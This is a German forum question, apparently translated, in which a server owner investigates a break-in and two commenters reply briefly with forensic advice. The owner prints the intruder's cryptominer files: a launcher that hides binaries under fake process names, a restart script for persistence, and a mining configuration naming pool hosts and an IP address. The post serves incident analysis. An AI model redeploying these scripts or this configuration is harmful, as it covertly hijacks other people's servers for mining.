Wer und wie hat mein Server gehackt?

622
Sasha

Auf meinem Server habe ich gesehen, dass "syslogd" ziemlich viel CPU verbraucht und als lokaler Benutzer "copy: copy" (ein gültiger Benutzer in meinem System) ausgeführt wird. Eine kurze Untersuchung ergab, dass dieses "syslogd" von hier aus gestartet wurde:

ls /tmp/.mysql-2566 -rw-rw-r-- 1 copy copy 5 Nov 26 00:53 bash.pid -rwxrwxr-x 1 copy copy 838583 Feb 20 2016 f -rwxr-xr-x 1 copy copy 1049 Sep 24 08:45 httpd -rwxr-xr-x 1 copy copy 276 Sep 24 08:46 r -rwxr-xr-x 1 copy copy 1687632 Sep 24 07:52 syslogd -rwxrw-r-- 1 copy copy 182 Oct 13 02:53 upd 

Der Prozess wurde von selbst neu gestartet. Dies konnte nur durch Umbenennen des Verzeichnisses verhindert werden.

Sicher haben alle diese Elemente nichts mit syslogd / httpd / mysql gemeinsam. Die Dateien "f" und "syslogd" sind binär. Und den Inhalt anderer Dateien zeige ich der Vollständigkeit halber:

[root]# cat r #!/bin/bash ARCH=`uname -m` HIDE="/var/www/httpd2" hostname=`hostname` if [ "$ARCH" == "i686" ]; then ./e -s $HIDE ./systemd -c httpd >>/dev/null & elif [ "$ARCH" == "x86_64" ]; then ./f -s $HIDE ./syslogd -c httpd >>/dev/null &  fi echo $! > bash.pid 

Nächste Datei:

[root]# cat upd #!/bin/sh if test -r /tmp/.mysql-2566/bash.pid; then pid=$(cat /tmp/.mysql-2566/bash.pid) if $(kill -CHLD $pid >/dev/null 2>&1) then exit 0 fi fi cd /tmp/.mysql-2566 ./r &>/dev/null 

Und die "config" -Datei:

[root]# cat httpd  { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-priority": null, "donate-level": 0, "log-file": null, "pools": [ { "url": "nopro.online:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 }, { "url": "nopro.xyz:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 }, {  "url": "146.0.253.66:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 } ], "print-time": 60, "retries": 3, "retry-pause": 3, "safe": false, "syslog": false, "threads": null } 

Unterschriften der Binärdateien:

[root]# sha1sum f syslogd  59f5b21ef8a570c02453b5edb0e750a42a1382f6 f f00e1f4c277bdb99319f4c7540e0c5637d5ef07d syslogd 

Das Server-Root-Login ist deaktiviert und der Benutzer "sudo" hat ein sicheres Kennwort.

  1. Woher weiß ich, wie der Server gehackt wurde?
  2. Wer (und von wo aus) installiert die Dateien in "/tmp/.mysql-2566"?
  3. Wer sonst hat sich mit diesem Problem konfrontiert?

Vielen Dank im Voraus!

-2
Dies wird keine einfache Antwort sein. Sie müssen die Protokolldateien durchkämmen, um eine Vorstellung davon zu erhalten, was mit Ihrem Server passiert ist. Ein Ausgangspunkt wäre jeder Prozess, der mit der Benutzer-ID "copy" ausgeführt wird, außerdem wenn er eine offene externe Schnittstelle (Listening Socket) hat. Wenn nicht, müssen Sie einen Weg zu dieser Benutzer-ID zurückverfolgen. In jedem Fall scheint das System ziemlich kompromittiert zu sein und garantiert eine vollständige Neuinstallation silmaril vor 5 Jahren 2
Wenn Sie forensische Untersuchungen durchführen möchten, sollten Sie dies nicht auf einem Live-System tun. Das Einrichten eines Honeypots kann auch eine gute Idee sein, wenn Sie nicht genügend Informationen vom betroffenen Server extrahieren können. dirkt vor 5 Jahren 1

0 Antworten auf die Frage